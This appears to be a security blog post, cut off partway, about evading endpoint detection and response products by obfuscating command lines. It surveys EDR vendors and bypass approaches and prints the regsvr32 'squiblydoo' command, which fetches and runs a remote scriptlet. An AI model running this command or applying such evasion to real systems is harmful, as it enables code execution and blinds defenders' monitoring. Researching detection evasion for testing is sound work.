ATTACKIFY





  • Home
  • Strings and Things...

A less fancier but still effective way to bypass EDR

blog-thumb
strings_image

Endpoint Point Protection

Antivirus was developed over two decades and as the threat landscape changed and it became harder and harder for the traditional signature based solution to keep up with the growing threats. Somewhere around 2013 the next generation of endpoint protection platforms was coined…Endpoint Detection & Response (EDR). Most EDR solutions mostly dont use signature databases to detect malware and suspicious activity (we did say mostly dont have…but to a degree they do), they use a combination of static machine learning analysis and dynamic behavioural analysis to detect and protect endpoint systems.

There are a lot of EDR solutions on the market, below is just a small list of what we have played with and done some research on:

  • VMware CarbonBlack
  • CrowdStrike Falcon
  • SentinelOne
  • Microsoft Defender
  • Sophos EDR

EDR solutions in general are great (mostly), detecting suspicious behaviour, blocking things from running the moment the threat level for a process hits a certain threshold, blocking that ransomware in its tracks. EDR’s are not perfect but they do a pretty great job (mostly) when deployed and managed correctly. We wont be going into any details on how they run, telemetry etc. You can find some really great write ups from the vendors themselves and other researchers.

Common EDR Attacks and Research

There is a fair amount of smart people playing in the EDR security research space

But in short summary a lot of the attacks focus around Hooking, Unhooking, Patching, avoiding NTDLL.dll, avoiding pretty much all API’s with Direct SysCalls. You can find some more details summarised here:

https://s3cur3th1ssh1t.github.io/A-tale-of-EDR-bypass-methods/

Obfuscation

Sifting through the telemetry collected from vairous EDR consoles (EDR collects a lot), analysing the data of our detected activity, it got us thinking about obfuscating the commandline to see if we could bypass some of the detection that kept getting flagged on Windows Endpoints within the EDR consoles. So we looked into a few different ways to obfuscate commands executed from the commandline and look at ways to obfuscated known malicious commands.

We decided on a commonly used and well known and blocked commandline attack known as the squiblydoo (Mitre Attack - T1218.010)

        regsvr32.exe /s /u /i:https://www.attackify.com/test.sct scrobj.dll

And you will find that generally antivirus and EDRs are pretty good at capturing these sort of things:

export_view_image

After trying a number of different variations and ideas something interesting eventually